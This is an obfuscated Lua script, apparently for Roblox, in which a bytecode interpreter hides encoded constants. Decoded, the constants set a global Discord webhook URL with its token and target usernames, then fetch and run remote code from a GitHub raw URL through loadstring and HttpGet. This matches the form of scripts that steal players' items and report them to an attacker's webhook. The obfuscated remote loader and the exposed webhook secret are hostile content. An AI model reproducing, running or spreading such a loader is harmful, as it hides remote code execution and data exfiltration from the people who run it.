--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((879 -(282 + 595))^(((v33-1) -(v32-(1 -0))) + 1)) ;return v83-(v83%((8 -6) -(118 -(32 + 85)))) ;else local v84=619 -(555 + 63 + 1) ;local v85;while true do if (v84==(931 -(857 + 74))) then v85=2^(v32-(569 -(82 + 285 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (960 -(892 + (415 -(87 + 263)))) );v19=v19 + (9 -5) ;return (v37 * (31011612 -14234396)) + (v36 * (120312 -54776)) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v38==4) then v47=nil;while true do if (v39==3) then v46=nil;v47=nil;v39=15 -11 ;end if (v39==(4 + 0)) then while true do if (v40==(653 -(494 + 157))) then v45=nil;v46=nil;v40=6 -3 ;end if (v40~=(3 + 0)) then else v47=nil;while true do local v102=0;local v103;while true do if (v102==0) then v103=0 + 0 ;while true do if (v103==0) then if (v41~=(0 + 0)) then else local v159=0;local v160;local v161;while true do if (v159==0) then v160=836 -(660 + 176) ;v161=nil;v159=1 + 0 ;end if (v159~=1) then else while true do if (0~=v160) then else v161=202 -(14 + 188) ;while true do if (v161~=1) then else local v174=675 -(534 + 141) ;while true do if (0~=v174) then else v44={};v45={v42,v43,nil,v44};v174=1 + 0 ;end if ((1 + 0)==v174) then v161=2;break;end end end if (v161==2) then v41=1 -0 ;break;end if (v161==0) then local v175=0;while true do if (v175~=1) then else v161=1 -0 ;break;end if (v175==(0 -0)) then v42={};v43={};v175=1 + 0 ;end end end end break;end end break;end end end if (v41==1) then local v162=0;local v163;local v164;while true do if (v162~=(0 + 0)) then else v163=396 -(115 + 281) ;v164=nil;v162=2 -1 ;end if (v162~=1) then else while true do if (0~=v163) then else v164=0 + 0 ;while true do if ((2 -1)==v164) then local v176=0 -0 ;while true do if (1==v176) then v164=2;break;end if ((867 -(550 + 317))==v176) then for v178=1,v46 do local v179=0 -0 ;local v180;local v181;local v182;while true do if (v179==0) then local v183=0 -0 ;while true do if (v183~=(0 -0)) then else v180=285 -(134 + 151) ;v181=nil;v183=1666 -(970 + 695) ;end if (v183~=(1 -0)) then else v179=1991 -(582 + 1408) ;break;end end end if (v179==1) then v182=nil;while true do if (v180==(3 -2)) then if (v181==1) then v182=v22()~=(0 -0) ;elseif (v181==2) then v182=v25();elseif (v181==3) then v182=v26();end v47[v178]=v182;break;end if (v180==(0 -0)) then local v190=0;local v191;while true do if (v190~=0) then else v191=0;while true do if (v191==(1824 -(1195 + 629))) then local v196=0;local v197;while true do if (v196~=(0 -0)) then else v197=0;while true do if (v197~=0) then else v181=v22();v182=nil;v197=1;end if (v197==(242 -(187 + 54))) then v191=781 -(162 + 618) ;break;end end break;end end end if (v191==1) then v180=1;break;end end break;end end end end break;end end end v45[3]=v22();v176=1 + 0 ;end end end if ((0 + 0)==v164) then v46=v24();v47={};v164=1;end if (v164==2) then v41=3 -1 ;break;end end break;end end break;end end end v103=1;end if ((1 -0)~=v103) then else if (v41==(1 + 1)) then local v165=0;while true do if (v165~=(1637 -(1373 + 263))) then else return v45;end if (v165==(1000 -(451 + 549))) then for v166=1,v24() do local v167=0 + 0 ;local v168;local v169;local v170;local v171;while true do if (v167==(1 -0)) then v170=nil;v171=nil;v167=2 -0 ;end if (v167==(1384 -(746 + 638))) then v168=0;v169=nil;v167=1;end if (v167==(1 + 1)) then while true do if (v168==1) then v171=nil;while true do if (v169==1) then while true do if (v170~=(0 -0)) then else v171=v22();if (v21(v171,342 -(218 + 123) ,1582 -(1535 + 46) )~=(0 + 0)) then else local v184=0 + 0 ;local v185;local v186;local v187;local v188;while true do if (v184==1) then v187=nil;v188=nil;v184=562 -(306 + 254) ;end if (2==v184) then while true do if (v185==(0 + 0)) then local v192=0;while true do if (v192~=(1 -0)) then else v185=1468 -(899 + 568) ;break;end if (v192==(0 + 0)) then v186=v21(v171,4 -2 ,3);v187=v21(v171,607 -(268 + 335) ,296 -(60 + 230) );v192=573 -(426 + 146) ;end end end if (v185~=3) then else if (v21(v187,1 + 2 ,3)==(1457 -(282 + 1174))) then v188[815 -(569 + 242) ]=v47[v188[11 -7 ]];end v42[v166]=v188;break;end if (v185~=(1 + 0)) then else local v194=1024 -(706 + 318) ;while true do if (1==v194) then v185=1253 -(721 + 530) ;break;end if (v194~=0) then else v188={v23(),v23(),nil,nil};if (v186==0) then local v200=0 -0 ;while true do if (v200==(0 + 0)) then v188[703 -(271 + 429) ]=v23();v188[4]=v23();break;end end elseif (v186==(1 + 0)) then v188[1503 -(1408 + 92) ]=v24();elseif (v186==2) then v188[1089 -(461 + 625) ]=v24() -((1290 -(993 + 295))^16) ;elseif (v186==(1 + 2)) then local v209=1171 -(418 + 753) ;local v210;local v211;while true do if (v209==(0 + 0)) then v210=0;v211=nil;v209=1 + 0 ;end if (1==v209) then while true do if ((0 + 0)==v210) then v211=0 + 0 ;while true do if (v211~=(529 -(406 + 123))) then else v188[3]=v24() -((1771 -(1749 + 20))^(4 + 12)) ;v188[4]=v23();break;end end break;end end break;end end end v194=1;end end end if ((1324 -(1249 + 73))==v185) then local v195=0 + 0 ;while true do if (v195==(1146 -(466 + 679))) then v185=6 -3 ;break;end if (v195==0) then if (v21(v187,2 -1 ,1901 -(106 + 1794) )~=1) then else v188[1 + 1 ]=v47[v188[1 + 1 ]];end if (v21(v187,5 -3 ,5 -3 )==(115 -(4 + 110))) then v188[3]=v47[v188[587 -(57 + 527) ]];end v195=1;end end end end break;end if (v184==(1427 -(41 + 1386))) then v185=0;v186=nil;v184=1;end end end break;end end break;end if (v169~=0) then else v170=103 -(17 + 86) ;v171=nil;v169=1 + 0 ;end end break;end if (v168==0) then v169=0 -0 ;v170=nil;v168=2 -1 ;end end break;end end end for v172=1,v24() do v43[v172-(167 -(122 + 44)) ]=v29();end v165=1;end end end break;end end break;end end end break;end if (v40==(0 -0)) then local v100=0 -0 ;while true do if (v100~=(0 + 0)) then else v41=0 + 0 ;v42=nil;v100=1 -0 ;end if (v100~=(66 -(30 + 35))) then else v40=1;break;end end end if (v40==(1 + 0)) then local v101=1257 -(1043 + 214) ;while true do if (v101==(0 -0)) then local v127=0;while true do if (v127==0) then v43=nil;v44=nil;v127=1213 -(323 + 889) ;end if (v127==(2 -1)) then v101=1;break;end end end if (v101==(581 -(361 + 219))) then v40=322 -(53 + 267) ;break;end end end end break;end if (v39==0) then v40=0;v41=nil;v39=1 + 0 ;end if (v39==2) then local v97=0;while true do if (v97~=0) then else v44=nil;v45=nil;v97=1;end if (v97==1) then v39=3;break;end end end if (v39==(414 -(15 + 398))) then v42=nil;v43=nil;v39=984 -(18 + 964) ;end end break;end if (v38==(3 -2)) then v41=nil;v42=nil;v38=2 + 0 ;end if (v38==2) then v43=nil;v44=nil;v38=3;end if (v38==3) then v45=nil;v46=nil;v38=3 + 1 ;end if (0~=v38) then else v39=850 -(20 + 830) ;v40=nil;v38=1 + 0 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=(126 + 1) -(116 + 10) ;local v51=(v21(v49,1 + 0 ,758 -(542 + 196) ) * (2^(68 -36))) + v48 ;local v52=v21(v49,7 + 14 ,16 + 15 );local v53=((v21(v49,12 + 20 )==((2 + 0) -1)) and  -(2 -1)) or 1 ;if (v52==(1551 -(1126 + 425))) then if (v51==((173 + 232) -(118 + 287))) then return v53 * (0 -0) ;else v52=1122 -(118 + 1003) ;v50=0;end elseif (v52==(5990 -3943)) then return ((v51==(377 -(82 + 60 + 235))) and (v53 * ((4 -3)/((0 -0) + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(2000 -(553 + 424)) ) * (v50 + (v51/((3 -1)^((127 -81) + 6)))) ;end v26=nil;function v26(v54)local v55;if  not v54 then local v86=0 -0 ;while true do if (v86==((1329 -(797 + 532)) + 0)) then v54=v24();if (v54==(0 -0)) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -((548 + 206) -(239 + 514)) );v19=v19 + v54 ;local v56={};for v67=1 + 0 , #v55 do v56[v67]=v2(v1(v3(v55,v67,v67)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + 1 + 1 );v19=v19 + 2 ;return (v59 * (601 -345)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v87=0;while true do if (v87==0) then v20=v0(v3(v60,1,1));return "";end end else local v88=0;local v89;while true do if (0==v88) then v89=v2(v0(v60,16));if v20 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v89,v20);v20=nil;v98=1;end end else return v89;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v90=0,v77 do if (v90>=v71) then v75[v90-v71 ]=v76[v90 + 1 ];else v79[v90]=v76[v90 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]=v81[3];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=2) then do return;end elseif (v82==3) then v79[v81[2]][v81[3]]=v81[4];elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=7) then if (v82<=5) then v79[v81[2]]=v63[v81[3]];elseif (v82==6) then v79[v81[2]]();else v79[v81[2]]=v81[3];end elseif (v82<=8) then local v109=0;local v110;while true do if (v109==0) then v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));break;end end elseif (v82>9) then do return;end else v73=v81[3];end elseif (v82<=15) then if (v82<=12) then if (v82==11) then local v111=0;local v112;local v113;local v114;local v115;while true do if (v111==1) then v74=(v114 + v112) -1 ;v115=0;v111=2;end if (0==v111) then v112=v81[2];v113,v114=v72(v79[v112](v13(v79,v112 + 1 ,v81[3])));v111=1;end if (v111==2) then for v149=v112,v74 do local v150=0;while true do if (v150==0) then v115=v115 + 1 ;v79[v149]=v113[v115];break;end end end break;end end else local v116=v81[2];v79[v116]=v79[v116](v13(v79,v116 + 1 ,v74));end elseif (v82<=13) then v79[v81[2]]();elseif (v82==14) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=18) then if (v82<=16) then local v118=v81[2];local v119,v120=v72(v79[v118](v13(v79,v118 + 1 ,v81[3])));v74=(v120 + v118) -1 ;local v121=0;for v124=v118,v74 do v121=v121 + 1 ;v79[v124]=v119[v121];end elseif (v82==17) then v73=v81[3];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=19) then v79[v81[2]][v81[3]]=v81[4];elseif (v82==20) then local v137=0;local v138;local v139;while true do if (1==v137) then v79[v138 + 1 ]=v139;v79[v138]=v139[v81[4]];break;end if (0==v137) then v138=v81[2];v139=v79[v81[3]];v137=1;end end else local v140=v81[2];local v141=v79[v81[3]];v79[v140 + 1 ]=v141;v79[v140]=v141[v81[4]];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132313334383731373536303231373638322F48346F67484C616834537866364B4E4346586B56346858622D663950443437684F496A767747766D615667682D522O61364E73656E445471786342436652767949575F54030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030C3O005368617264506C617965723703093O00557365724E616D653200173O0012073O00013O00260E3O000E000100020004113O000E0001002O12000100033O003003000100040005002O12000100063O002O12000200073O002014000200020008001207000400094O0001000500014O000B000200054O000C00013O00022O00060001000100010004113O0016000100260E3O0001000100010004113O00010001002O12000100033O0030030001000A000B002O12000100033O0030030001000C000B0012073O00023O0004113O000100012O00023O00017O00",v9(),...);end
